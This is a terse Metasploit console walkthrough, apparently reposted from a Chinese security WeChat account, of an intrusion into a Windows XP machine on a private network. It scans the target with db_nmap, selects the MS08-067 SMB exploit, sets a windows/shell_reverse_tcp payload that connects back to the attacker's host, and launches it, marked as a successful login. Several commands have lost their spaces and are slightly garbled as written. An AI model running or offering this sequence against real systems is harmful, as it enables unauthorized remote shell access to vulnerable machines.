root@kali:~# msfconsole
msf > workspace
msf > db_status
msf > workspace -a testlab
msf > db_nmap -T4 -A 192.168.1.78
msf > hosts
msf > services
msf exploit(ms06_040_netapi) > searchnetapi
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/smb/ms03_049_netapi 2003-11-11 good MS03-049 Microsoft Workstation ServiceNetAddAlternateComputerName Overflow
exploit/windows/smb/ms06_040_netapi 2006-08-08 good MS06-040 Microsoft Server Service NetpwPathCanonicalizeOverflow
exploit/windows/smb/ms06_070_wkssvc 2006-11-14 manual MS06-070 Microsoft Workstation ServiceNetpManageIPCConnect Overflow
exploit/windows/smb/ms08_067_netapi 2008-10-28 great MS08-067 Microsoft Server Service RelativePath Stack Corruption
msf > useexploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > showpayloads
msf exploit(ms08_067_netapi) > setpayload windows/shell_reverse_tcp
payload => windows/shell_reverse_tcp
msf exploit(ms08_067_netapi) > showoptions
msf exploit(ms08_067_netapi) > set rhost192.168.1.78
rhost => 192.168.1.78
msf exploit(ms08_067_netapi) > set lhost192.168.1.242
lhost => 192.168.1.242
msf exploit(ms08_067_netapi) > showoptions
msf exploit(ms08_067_netapi) > exploit (成功登陆)
本文始发于微信公众号(飓风网络安全):入侵(适用于windows xp sp0 sp1,只看思路) 类似 armitage
评论